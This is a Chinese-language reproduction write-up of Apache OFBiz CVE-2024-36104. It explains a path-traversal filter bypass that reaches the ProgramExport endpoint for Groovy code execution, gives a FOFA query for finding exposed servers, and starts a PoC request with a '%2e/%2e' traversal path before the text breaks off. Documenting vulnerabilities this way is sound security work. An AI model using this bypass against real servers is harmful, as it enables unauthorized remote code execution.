Apache OFBiz 路径遍历导致RCE漏洞复现（CVE-2024-36104）

0x01 产品简介

Apache OFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径（请求URL中的特殊字符（如 ；、%2e）限制不当导致攻击者能够绕过后台功能点的过滤器验证，并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。

0x03 影响范围

Apache OFBiz <= 18.12.14

0x04 复现环境

FOFA：app="Apache_OFBiz"

0x05 漏洞复现

PoC

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: you